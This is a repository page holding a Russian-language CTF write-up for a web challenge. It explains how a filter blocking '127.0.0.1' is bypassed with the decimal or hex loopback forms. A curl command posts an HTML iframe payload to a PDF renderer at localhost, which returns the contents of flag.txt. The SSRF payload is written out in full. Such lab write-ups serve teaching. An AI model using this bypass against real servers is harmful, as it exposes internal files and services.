kernel/Geroi-Kodeksa
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
Geroi-Kodeksa/LockholdPortalGuard-Web
History
Caplag 9511b38280 Init. commit
2026-03-02 21:44:22 +03:00
..
exploit.py
Init. commit
2026-03-02 21:44:22 +03:00
README.md
Init. commit
2026-03-02 21:44:22 +03:00

README.md

Web 1.2 Страж Портала Локхолда

В Портале Локхолда стоит Страж: он не пропускает запретные имена, но не знает истинных числовых титулов. Архимаг печатает свитки, и через печать можно заглянуть туда, куда запрещено смотреть.

Решение

Фильтр блокирует строку 127.0.0.1, но не все эквивалентные формы loopback-адреса. Если использовать числовое представление (2130706433 или 0x7f000001), проверка обходится, и рендерер открывает тот же локальный адрес.

Дальше всё стандартно: вставляем URL в iframe внутри HTML-свитка, отправляем контент на /seal и получаем PDF с содержимым flag.txt.

Пример

Вариант через curl:

curl -s -X POST http://localhost:8000/seal \
  -F 'content=<h1>Королевский Указ</h1><iframe src="http://2130706433/flag.txt" style="width:800px;height:200px"></iframe>' \
  -F 'format=html' \
  -o scroll.pdf

Также можно воспользоваться готовым скриптом solve/exploit.py:

python solve/exploit.py http://localhost:8000
Reference in New Issue View Git Blame Copy Permalink